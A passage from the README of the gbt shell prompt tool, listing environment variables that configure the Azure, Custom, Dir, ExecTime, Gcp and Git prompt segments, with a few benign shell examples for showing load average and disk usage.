}}` element.\n\n- `GBT_CAR_AZURE_DEFAULTS_GROUP_FM`\n\n Formatting of the `{{ DefaultsGroup }}` element.\n\n- `GBT_CAR_AZURE_DEFAULTS_GROUP_TEXT`\n\n Text content of the `{{ DefaultsGroup }}` element specifying the configured\n default resource group.\n\n- `GBT_CAR_AZURE_DISPLAY`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_AZURE_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_AZURE_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_AZURE_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_AZURE_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_AZURE_SEP_FM`\n\n Formatting of the separator for this car.\n\n\n#### `Custom` car\n\nThe main purpose of this car is to provide the possibility to create car with\ncustom text.\n\n- `GBT_CAR_CUSTOM_BG='yellow'`\n\n Background color of the car.\n\n- `GBT_CAR_CUSTOM_FG='default'`\n\n Foreground color of the car.\n\n- `GBT_CAR_CUSTOM_FM='none'`\n\n Formatting of the car.\n\n- `GBT_CAR_CUSTOM_FORMAT=' {{ Text }} '`\n\n Format of the car.\n\n- `GBT_CAR_CUSTOM_TEXT_BG`\n\n Background color of the `{{ Text }}` element.\n\n- `GBT_CAR_CUSTOM_TEXT_FG`\n\n Foreground color of the `{{ Text }}` element.\n\n- `GBT_CAR_CUSTOM_TEXT_FM`\n\n Formatting of the `{{ Text }}` element.\n\n- `GBT_CAR_CUSTOM_TEXT_TEXT='?'`\n\n Text content of the `{{ Text }}` element.\n\n- `GBT_CAR_CUSTOM_TEXT_CMD`\n\n The `{{ Text }}` element will be replaced by standard output of the command\n specified in this variable. Content of the `GBT_CAR_CUSTOM_TEXT_TEXT` variable\n takes precedence over this variable.\n\n ```shell\n # Show 1 minute loadavg as the content of the Text element\n export GBT_CAR_CUSTOM_TEXT_CMD=\"uptime | sed -e 's/.*load average: //' -e 's/,.*//'\"\n ```\n\n- `GBT_CAR_CUSTOM_TEXT_EXECUTOR='sh'`\n\n Executor used to execute all text command (`_TEXT_CMD`).\n\n- `GBT_CAR_CUSTOM_TEXT_EXECUTOR='-c'`\n\n Parameter for the executor used to execute text command (`_TEXT_CMD`).\n\n- `GBT_CAR_CUSTOM_DISPLAY='1'`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_CUSTOM_DISPLAY_CMD`\n\n Command which gets executed in order to evaluate whether the car should be\n displayed or not. Content of the `GBT_CAR_CUSTOM_DISPLAY` variable takes\n precedence over this variable.\n\n- `GBT_CAR_CUSTOM_DISPLAY_EXECUTOR='sh'`\n\n Executor used to execute all display command (`_TEXT_CMD`).\n\n- `GBT_CAR_CUSTOM_DISPLAY_EXECUTOR='-c'`\n\n Parameter for the executor used to execute display command (`_TEXT_CMD`).\n\n ```shell\n # Show percentage of used disk space of the root partition\n export GBT_CAR_CUSTOM_TEXT_CMD=\"df -h --output=pcent / | tail -n1 | sed -re 's/\\s//g' -e 's/%/%%/'\"\n # Display the car only if the percentage is above 90%\n export GBT_CAR_CUSTOM_DISPLAY_CMD=\"[[ $(df -h --output=pcent / | tail -n1 | sed -re 's/\\s//g' -e 's/%//') -gt 70 ]] && echo YES\"\n ```\n\n- `GBT_CAR_CUSTOM_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_CUSTOM_EXECUTOR='sh'`\n\n Executor used to execute all custom commands (`_TEXT_CMD` and `_DISPLAY_CMD`).\n\n- `GBT_CAR_CUSTOM_EXECUTOR='-c'`\n\n Parameter for the executor used to execute all custom commands (`_TEXT_CMD`\n and `_DISPLAY_CMD`).\n\n- `GBT_CAR_CUSTOM_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_CUSTOM_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_CUSTOM_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_CUSTOM_SEP_FM`\n\n Formatting of the separator for this car.\n\nMultiple `Custom` cars can be used in the `GBT_CARS` variable. Just add some\nidentifier behind the car name. To set properties of the new car, just add the\nsame identifier into the environment variable:\n\n```shell\n# Adding Custom and Custom1 car\nexport GBT_CARS='Status, Os, Custom, Custom1, Hostname, Dir, Git, Sign'\n# The text of the default Custom car\nexport GBT_CAR_CUSTOM_TEXT_TEXT='default'\n# The text of the Custom1 car\nexport GBT_CAR_CUSTOM1_TEXT_TEXT='1'\n# Set different background color for the Custom1 car\nexport GBT_CAR_CUSTOM1_BG='magenta'\n```\n\n\n#### `Dir` car\n\nCar that displays current directory name.\n\n- `GBT_CAR_DIR_BG='blue'`\n\n Background color of the car.\n\n- `GBT_CAR_DIR_FG='light_gray'`\n\n Foreground color of the car.\n\n- `GBT_CAR_DIR_FM='none'`\n\n Formatting of the car.\n\n- `GBT_CAR_DIR_FORMAT=' {{ Dir }} '`\n\n Format of the car.\n\n- `GBT_CAR_DIR_DIR_BG`\n\n Background color of the `{{ Dir }}` element.\n\n- `GBT_CAR_DIR_DIR_FG`\n\n Foreground color of the `{{ Dir }}` element.\n\n- `GBT_CAR_DIR_DIR_FM`\n\n Formatting of the `{{ Dir }}` element.\n\n- `GBT_CAR_DIR_DIR_TEXT`\n\n Text content of the `{{ Dir }}` element. The directory name.\n\n- `GBT_CAR_DIR_DIRSEP`\n\n OS-default character used to separate directories.\n\n- `GBT_CAR_DIR_HOMESIGN='~'`\n\n Character which represents the user's home directory. If set to empty\n string, full home directory path is used instead.\n\n- `GBT_CAR_DIR_DEPTH='1'`\n\n Number of directories to show.\n\n- `GBT_CAR_DIR_NONCURLEN='255'`\n\n Indicates how many characters of the non-current directory name should be\n displayed. This can be set to `1` to display only the first character of the\n directory name when using `GBT_CAR_DIR_DEPTH` with value grater than one.\n\n- `GBT_CAR_DIR_DISPLAY='1'`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_DIR_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_DIR_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_DIR_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_DIR_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_DIR_SEP_FM`\n\n Formatting of the separator for this car.\n\n\n#### `ExecTime` car\n\nCar that displays how long each shell command run.\n\n- `GBT_CAR_EXECTIME_BG='light_gray'`\n\n Background color of the car.\n\n- `GBT_CAR_EXECTIME_FG='black'`\n\n Foreground color of the car.\n\n- `GBT_CAR_EXECTIME_FM='none'`\n\n Formatting of the car.\n\n- `GBT_CAR_EXECTIME_FORMAT=' {{ Time }} '`\n\n Format of the car.\n\n- `GBT_CAR_EXECTIME_DURATION_BG`\n\n Background color of the `{{ Duration }}` element.\n\n- `GBT_CAR_EXECTIME_DURATION_FG`\n\n Foreground color of the `{{ Duration }}` element.\n\n- `GBT_CAR_EXECTIME_DURATION_FM`\n\n Formatting of the `{{ Duration }}` element.\n\n- `GBT_CAR_EXECTIME_DURATION_TEXT`\n\n Text content of the `{{ Duration }}` element. The duration of the execution\n time (e.g `1h8m19s135ms` for precision set to `3`).\n\n- `GBT_CAR_EXECTIME_SECONDS_BG`\n\n Background color of the `{{ Seconds }}` element.\n\n- `GBT_CAR_EXECTIME_SECONDS_FG`\n\n Foreground color of the `{{ Seconds }}` element.\n\n- `GBT_CAR_EXECTIME_SECONDS_FM`\n\n Formatting of the `{{ Seconds }}` element.\n\n- `GBT_CAR_EXECTIME_SECONDS_TEXT`\n\n Text content of the `{{ Seconds }}` element. The execution time in seconds\n (e.g. `4099.1358` for precision set to `4`).\n\n- `GBT_CAR_EXECTIME_TIME_BG`\n\n Background color of the `{{ Time }}` element.\n\n- `GBT_CAR_EXECTIME_TIME_FG`\n\n Foreground color of the `{{ Time }}` element.\n\n- `GBT_CAR_EXECTIME_TIME_FM`\n\n Formatting of the `{{ Time }}` element.\n\n- `GBT_CAR_EXECTIME_TIME_TEXT`\n\n Text content of the `{{ Time }}` element. The execution time (e.g.\n `01:08:19.1358` for precision set to `4`).\n\n- `GBT_CAR_EXECTIME_PRECISION='0'`\n\n Sub-second precision to show.\n\n- `GBT_CAR_EXECTIME_SECS`\n\n The number of seconds the command run in shell. This variable is defined in\n the source file as shown bellow.\n\n- `GBT_CAR_EXECTIME_BELL='0'`\n\n Sound console bell if the executed command exceeds specified number of\n seconds. Value set to `0` disables the bell (default).\n\n- `GBT_CAR_EXECTIME_DISPLAY='1'`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_EXECTIME_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_EXECTIME_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_EXECTIME_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_EXECTIME_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_EXECTIME_SEP_FM`\n\n Formatting of the separator for this car.\n\nIn order to allow this car to calculate the execution time, the following must\nbe loaded in the shell:\n\n```shell\n# For Bash\nsource /usr/share/gbt/sources/exectime/bash.sh\n# For ZSH\nsource /usr/share/gbt/sources/exectime/zsh.sh\n```\n\nOn macOS the `date` command does not support `%N` format for milliseconds and\nyou need to override the environment variable `GBT__SOURCE_DATE_ARG='+%s`.\n\n\n#### `Gcp` car\n\nCar that displays information about the local [GCP](https://cloud.google.com/)\nconfiguration.\n\n- `GBT_CAR_GCP_BG='33'`\n\n Background color of the car.\n\n- `GBT_CAR_GCP_FG='white'`\n\n Foreground color of the car.\n\n- `GBT_CAR_GCP_FM='none'`\n\n Formatting of the car.\n\n- `GBT_CAR_GCP_FORMAT=' {{ Icon }} {{ Project }} '`\n\n Format of the car.\n\n- `GBT_CAR_GCP_ICON_BG`\n\n Background color of the `{{ Icon }}` element.\n\n- `GBT_CAR_GCP_ICON_FG`\n\n Foreground color of the `{{ Icon }}` element.\n\n- `GBT_CAR_GCP_ICON_FM`\n\n Formatting of the `{{ Icon }}` element.\n\n- `GBT_CAR_GCP_ICON_TEXT='\ue7b2'`\n\n Text content of the `{{ Icon }}` element.\n\n- `GBT_CAR_GCP_ACCOUNT_BG`\n\n Background color of the `{{ Account }}` element.\n\n- `GBT_CAR_GCP_ACCOUNT_FG`\n\n Foreground color of the `{{ Account }}` element.\n\n- `GBT_CAR_GCP_ACCOUNT_FM`\n\n Formatting of the `{{ Account }}` element.\n\n- `GBT_CAR_GCP_ACCOUNT_TEXT`\n\n Text content of the `{{ Account }}` element specifying the configured account.\n\n- `GBT_CAR_GCP_CONFIG_BG`\n\n Background color of the `{{ Config }}` element.\n\n- `GBT_CAR_GCP_CONFIG_FG`\n\n Foreground color of the `{{ Config }}` element.\n\n- `GBT_CAR_GCP_CONFIG_FM`\n\n Formatting of the `{{ Config }}` element.\n\n- `GBT_CAR_GCP_CONFIG_TEXT`\n\n Text content of the `{{ Config }}` element specifying the active\n configuration.\n\n- `GBT_CAR_GCP_PROJECT_BG`\n\n Background color of the `{{ Project }}` element.\n\n- `GBT_CAR_GCP_PROJECT_FG`\n\n Foreground color of the `{{ Project }}` element.\n\n- `GBT_CAR_GCP_PROJECT_FM`\n\n Formatting of the `{{ Project }}` element.\n\n- `GBT_CAR_GCP_PROJECT_TEXT`\n\n Text content of the `{{ Project }}` element specifying the configured project.\n\n- `GBT_CAR_GCP_PROJECT_ALIASES`\n\n List of aliases that allow to display different project name based on the\n original name. The following example shows how to change the project\n `my-dev-project-123456` to `dev` and the project `my-prod-project-654321` to\n `prod`.\n\n ```shell\n export GBT_CAR_GCP_PROJECT_ALIASES='\n my-dev-project-123456=dev,\n my-prod-project-654321=prod,\n '\n ```\n\n- `GBT_CAR_GCP_DISPLAY`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_GCP_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_GCP_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_GCP_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_GCP_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_GCP_SEP_FM`\n\n Formatting of the separator for this car.\n\n\n#### `Git` car\n\nCar that displays information about a local Git repository. This car is\ndisplayed only if the current directory is a Git repository.\n\n- `GBT_CAR_GIT_BG='light_gray'`\n\n Background color of the car.\n\n- `GBT_CAR_GIT_FG='black'`\n\n Foreground color of the car.\n\n- `GBT_CAR_GIT_FM='none'`\n\n Formatting of the car.\n\n- `GBT_CAR_GIT_FORMAT=' {{ Icon }} {{ Head }} {{ Status }}{{ Ahead }}{{ Behind }} '`\n\n Format of the car.\n\n- `GBT_CAR_GIT_ICON_BG`\n\n Background color of the `{{ Icon }}` element.\n\n- `GBT_CAR_GIT_ICON_FG`\n\n Foreground color of the `{{ Icon }}` element.\n\n- `GBT_CAR_GIT_ICON_FM`\n\n Formatting of the `{{ Icon }}` element.\n\n- `GBT_CAR_GIT_ICON_TEXT='\ue0a0'`\n\n Text content of the `{{ Icon }}` element.\n\n- `GBT_CAR_GIT_HEAD_BG`\n\n Background color of the `{{ Head }}` element.\n\n- `GBT_CAR_GIT_HEAD_FG`\n\n Foreground color of the `{{ Head }}` element.\n\n- `GBT_CAR_GIT_HEAD_FM`\n\n Formatting of the `{{ Head }}` element.\n\n- `GBT_CAR_GIT_HEAD_TEXT`\n\n Text content of the `{{ Head }}` element - branch, tag name or the\n commit ID.\n\n- `GBT_CAR_GIT_STATUS_BG`\n\n Background color of the `{{ Status }}` element.\n\n- `GBT_CAR_GIT_STATUS_FG`\n\n Foreground color of the `{{ Status }}` element.\n\n- `GBT_CAR_GIT_STATUS_FM`\n\n Formatting of the `{{ Status }}` element.\n\n- `GBT_CAR_GIT_STATUS_FORMAT`\n\n Format of the `{{ Status }}` element. The content is either\n `{{ StatusDirty }}` or `{{ StatusClean }}` depending on the state of the\n local Git repository.\n\n- `GBT_CAR_GIT_STATUS_DIRTY_BG`\n\n Background color of the `{{ StatusDirty }}` element.\n\n- `GBT_CAR_GIT_STATUS_DIRTY_FG='red'`\n\n Foreground color of the `{{ StatusDirty }}` element.\n\n- `GBT_CAR_GIT_STATUS_DIRTY_FM`\n\n Formatting of the `{{ StatusDirty }}` element.\n\n- `GBT_CAR_GIT_STATUS_DIRTY_TEXT='\u2718'`\n\n Text content of the `{{ StatusDirty }}` element.\n\n- `GBT_CAR_GIT_STATUS_CLEAN_BG`\n\n Background color of the `{{ StatusClean }}` element.\n\n- `GBT_CAR_GIT_STATUS_CLEAN_FG='green'`\n\n Foreground color of the `{{ StatusClean }}` element.\n\n- `GBT_CAR_GIT_STATUS_CLEAN_FM`\n\n Formatting of the `{{ StatusClean }}` element.\n\n- `GBT_CAR_GIT_STATUS_CLEAN_TEXT='\u2714'`\n\n Text content of the `{{ StatusClean }}` element.\n\n- `GBT_CAR_GIT_STATUS_ADDED_BG`\n\n Background color of the `{{ StatusAdded }}` element.\n\n- `GBT_CAR_GIT_STATUS_ADDED_FG`\n\n Foreground color of the `{{ StatusAdded }}` element.\n\n- `GBT_CAR_GIT_STATUS_ADDED_FM`\n\n Formatting of the `{{ StatusAdded }}` element.\n\n- `GBT_CAR_GIT_STATUS_ADDED_FORMAT='{{ StatusAddedSymbol }}'`\n\n Format of the the `{{ StatusAdded }}` element. It can be\n `{{ StatusAddedSymbol }}` or `{{ StatusAddedCount }}`.\n\n- `GBT_CAR_GIT_STATUS_ADDED_SYMBOL_BG`\n\n Background color of the `{{ StatusAddedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_ADDED_SYMBOL_FG`\n\n Foreground color of the `{{ StatusAddedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_ADDED_SYMBOL_FM`\n\n Formatting of the `{{ StatusAddedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_ADDED_SYMBOL_TEXT=' \u27f4'`\n\n Text content of the `{{ StatusAddedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_ADDED_COUNT_BG`\n\n Background color of the `{{ StatusAddedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_ADDED_COUNT_FG`\n\n Foreground color of the `{{ StatusAddedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_ADDED_COUNT_FM`\n\n Formatting of the `{{ StatusAddedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_ADDED_COUNT_TEXT`\n\n Text content of the `{{ StatusAddedCount }}` element. By default it contains\n a number of added files.\n\n- `GBT_CAR_GIT_STATUS_COPIED_BG`\n\n Background color of the `{{ StatusCopied }}` element.\n\n- `GBT_CAR_GIT_STATUS_COPIED_FG`\n\n Foreground color of the `{{ StatusCopied }}` element.\n\n- `GBT_CAR_GIT_STATUS_COPIED_FM`\n\n Formatting of the `{{ StatusCopied }}` element.\n\n- `GBT_CAR_GIT_STATUS_COPIED_FORMAT='{{ StatusCopiedSymbol }}'`\n\n Format of the the `{{ StatusCopied }}` element. It can be\n `{{ StatusCopiedSymbol }}` or `{{ StatusCopiedCount }}`.\n\n- `GBT_CAR_GIT_STATUS_COPIED_SYMBOL_BG`\n\n Background color of the `{{ StatusCopiedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_COPIED_SYMBOL_FG`\n\n Foreground color of the `{{ StatusCopiedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_COPIED_SYMBOL_FM`\n\n Formatting of the `{{ StatusCopiedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_COPIED_SYMBOL_TEXT=' \u2948'`\n\n Text content of the `{{ StatusCopiedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_COPIED_COUNT_BG`\n\n Background color of the `{{ StatusCopiedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_COPIED_COUNT_FG`\n\n Foreground color of the `{{ StatusCopiedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_COPIED_COUNT_FM`\n\n Formatting of the `{{ StatusCopiedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_COPIED_COUNT_TEXT`\n\n Text content of the `{{ StatusCopiedCount }}` element. By default it contains\n a number of files copied.\n\n- `GBT_CAR_GIT_STATUS_DELETED_BG`\n\n Background color of the `{{ StatusDeleted }}` element.\n\n- `GBT_CAR_GIT_STATUS_DELETED_FG`\n\n Foreground color of the `{{ StatusDeleted }}` element.\n\n- `GBT_CAR_GIT_STATUS_DELETED_FM`\n\n Formatting of the `{{ StatusDeleted }}` element.\n\n- `GBT_CAR_GIT_STATUS_DELETED_FORMAT='{{ StatusDeletedSymbol }}'`\n\n Format of the the `{{ StatusDeleted }}` element. It can be\n `{{ StatusDeletedSymbol }}` or `{{ StatusDeletedCount }}`.\n\n- `GBT_CAR_GIT_STATUS_DELETED_SYMBOL_BG`\n\n Background color of the `{{ StatusDeletedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_DELETED_SYMBOL_FG`\n\n Foreground color of the `{{ StatusDeletedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_DELETED_SYMBOL_FM`\n\n Formatting of the `{{ StatusDeletedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_DELETED_SYMBOL_TEXT=' \u2796'`\n\n Text content of the `{{ StatusDeletedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_DELETED_COUNT_BG`\n\n Background color of the `{{ StatusDeletedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_DELETED_COUNT_FG`\n\n Foreground color of the `{{ StatusDeletedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_DELETED_COUNT_FM`\n\n Formatting of the `{{ StatusDeletedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_DELETED_COUNT_TEXT`\n\n Text content of the `{{ StatusDeletedCount }}` element. By default it contains\n a number of deleted files.\n\n- `GBT_CAR_GIT_STATUS_IGNORED_BG`\n\n Background color of the `{{ StatusIgnored }}` element.\n\n- `GBT_CAR_GIT_STATUS_IGNORED_FG`\n\n Foreground color of the `{{ StatusIgnored }}` element.\n\n- `GBT_CAR_GIT_STATUS_IGNORED_FM`\n\n Formatting of the `{{ StatusIgnored }}` element.\n\n- `GBT_CAR_GIT_STATUS_IGNORED_FORMAT='{{ StatusIgnoredSymbol }}'`\n\n Format of the the `{{ StatusIgnored }}` element. It can be\n `{{ StatusIgnoredSymbol }}` or `{{ StatusIgnoredCount }}`.\n\n- `GBT_CAR_GIT_STATUS_IGNORED_SYMBOL_BG`\n\n Background color of the `{{ StatusIgnoredSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_IGNORED_SYMBOL_FG`\n\n Foreground color of the `{{ StatusIgnoredSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_IGNORED_SYMBOL_FM`\n\n Formatting of the `{{ StatusIgnoredSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_IGNORED_SYMBOL_TEXT=' \u2b06'`\n\n Text content of the `{{ StatusIgnoredSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_IGNORED_COUNT_BG`\n\n Background color of the `{{ StatusIgnoredCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_IGNORED_COUNT_FG`\n\n Foreground color of the `{{ StatusIgnoredCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_IGNORED_COUNT_FM`\n\n Formatting of the `{{ StatusIgnoredSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_IGNORED_COUNT_TEXT`\n\n Text content of the `{{ StatusIgnoredCount }}` element. By default it contains\n a number of ignored files.\n\n- `GBT_CAR_GIT_STATUS_MODIFIED_BG`\n\n Background color of the `{{ StatusModified }}` element.\n\n- `GBT_CAR_GIT_STATUS_MODIFIED_FG`\n\n Foreground color of the `{{ StatusModified }}` element.\n\n- `GBT_CAR_GIT_STATUS_MODIFIED_FM`\n\n Formatting of the `{{ StatusModified }}` element.\n\n- `GBT_CAR_GIT_STATUS_MODIFIED_FORMAT='{{ StatusModifiedSymbol }}'`\n\n Format of the the `{{ StatusModified }}` element. It can be\n `{{ StatusModifiedSymbol }}` or `{{ StatusModifiedCount }}`.\n\n- `GBT_CAR_GIT_STATUS_MODIFIED_SYMBOL_BG`\n\n Background color of the `{{ StatusModifiedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_MODIFIED_SYMBOL_FG`\n\n Foreground color of the `{{ StatusModifiedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_MODIFIED_SYMBOL_FM`\n\n Formatting of the `{{ StatusModifiedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_MODIFIED_SYMBOL_TEXT=' \u2b06'`\n\n Text content of the `{{ StatusModifiedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_MODIFIED_COUNT_BG`\n\n Background color of the `{{ StatusModifiedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_MODIFIED_COUNT_FG`\n\n Foreground color of the `{{ StatusModifiedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_MODIFIED_COUNT_FM`\n\n Formatting of the `{{ StatusModifiedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_MODIFIED_COUNT_TEXT`\n\n Text content of the `{{ StatusModifiedCount }}` element. By default it\n contains a number of modified files.\n\n- `GBT_CAR_GIT_STATUS_RENAMED_BG`\n\n Background color of the `{{ StatusRenamed }}` element.\n\n- `GBT_CAR_GIT_STATUS_RENAMED_FG`\n\n Foreground color of the `{{ StatusRenamed }}` element.\n\n- `GBT_CAR_GIT_STATUS_RENAMED_FM`\n\n Formatting of the `{{ StatusRenamed }}` element.\n\n- `GBT_CAR_GIT_STATUS_RENAMED_FORMAT='{{ StatusRenamedSymbol }}'`\n\n Format of the the `{{ StatusRenamed }}` element. It can be\n `{{ StatusRenamedSymbol }}` or `{{ StatusRenamedCount }}`.\n\n- `GBT_CAR_GIT_STATUS_RENAMED_SYMBOL_BG`\n\n Background color of the `{{ StatusRenamedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_RENAMED_SYMBOL_FG`\n\n Foreground color of the `{{ StatusRenamedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_RENAMED_SYMBOL_FM`\n\n Formatting of the `{{ StatusRenamedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_RENAMED_SYMBOL_TEXT=' \u2b06'`\n\n Text content of the `{{ StatusRenamedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_RENAMED_COUNT_BG`\n\n Background color of the `{{ StatusRenamedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_RENAMED_COUNT_FG`\n\n Foreground color of the `{{ StatusRenamedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_RENAMED_COUNT_FM`\n\n Formatting of the `{{ StatusRenamedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_RENAMED_COUNT_TEXT`\n\n Text content of the `{{ StatusRenamedCount }}` element. By default it contains\n a number of renamed files.\n\n- `GBT_CAR_GIT_STATUS_STAGED_BG`\n\n Background color of the `{{ StatusStaged }}` element.\n\n- `GBT_CAR_GIT_STATUS_STAGED_FG`\n\n Foreground color of the `{{ StatusStaged }}` element.\n\n- `GBT_CAR_GIT_STATUS_STAGED_FM`\n\n Formatting of the `{{ StatusStaged }}` element.\n\n- `GBT_CAR_GIT_STATUS_STAGED_FORMAT='{{ StatusStagedSymbol }}'`\n\n Format of the the `{{ StatusStaged }}` element. It can be\n `{{ StatusStagedSymbol }}` or `{{ StatusStagedCount }}`.\n\n- `GBT_CAR_GIT_STATUS_STAGED_SYMBOL_BG`\n\n Background color of the `{{ StatusStagedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_STAGED_SYMBOL_FG`\n\n Foreground color of the `{{ StatusStagedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_STAGED_SYMBOL_FM`\n\n Formatting of the `{{ StatusStagedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_STAGED_SYMBOL_TEXT=' \u2b06'`\n\n Text content of the `{{ StatusStagedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_STAGED_COUNT_BG`\n\n Background color of the `{{ StatusStagedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_STAGED_COUNT_FG`\n\n Foreground color of the `{{ StatusStagedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_STAGED_COUNT_FM`\n\n Formatting of the `{{ StatusStagedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_STAGED_COUNT_TEXT`\n\n Text content of the `{{ StatusStagedCount }}` element. By default it contains\n a number of staged files.\n\n- `GBT_CAR_GIT_STATUS_UNMERGED_BG`\n\n Background color of the `{{ StatusUnmerged }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNMERGED_FG`\n\n Foreground color of the `{{ StatusUnmerged }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNMERGED_FM`\n\n Formatting of the `{{ StatusUnmerged }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNMERGED_FORMAT='{{ StatusUnmergedSymbol }}'`\n\n Format of the the `{{ StatusUnmerged }}` element. It can be\n `{{ StatusUnmergedSymbol }}` or `{{ StatusUnmergedCount }}`.\n\n- `GBT_CAR_GIT_STATUS_UNMERGED_SYMBOL_BG`\n\n Background color of the `{{ StatusUnmergedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNMERGED_SYMBOL_FG`\n\n Foreground color of the `{{ StatusUnmergedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNMERGED_SYMBOL_FM`\n\n Formatting of the `{{ StatusUnmergedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNMERGED_SYMBOL_TEXT=' \u2b06'`\n\n Text content of the `{{ StatusUnmergedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNMERGED_COUNT_BG`\n\n Background color of the `{{ StatusUnmergedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNMERGED_COUNT_FG`\n\n Foreground color of the `{{ StatusUnmergedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNMERGED_COUNT_FM`\n\n Formatting of the `{{ StatusUnmergedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNMERGED_COUNT_TEXT`\n\n Text content of the `{{ StatusUnmergedCount }}` element. By default it\n contains a number of unmerged files.\n\n- `GBT_CAR_GIT_STATUS_UNTRACKED_BG`\n\n Background color of the `{{ StatusUntracked }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNTRACKED_FG`\n\n Foreground color of the `{{ StatusUntracked }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNTRACKED_FM`\n\n Formatting of the `{{ StatusUntracked }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNTRACKED_FORMAT='{{ StatusUntrackedSymbol }}'`\n\n Format of the the `{{ StatusUntracked }}` element. It can be\n `{{ StatusUntrackedSymbol }}` or `{{ StatusUntrackedCount }}`.\n\n- `GBT_CAR_GIT_STATUS_UNTRACKED_SYMBOL_BG`\n\n Background color of the `{{ StatusUntrackedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNTRACKED_SYMBOL_FG`\n\n Foreground color of the `{{ StatusUntrackedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNTRACKED_SYMBOL_FM`\n\n Formatting of the `{{ StatusUntrackedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNTRACKED_SYMBOL_TEXT=' \u2b06'`\n\n 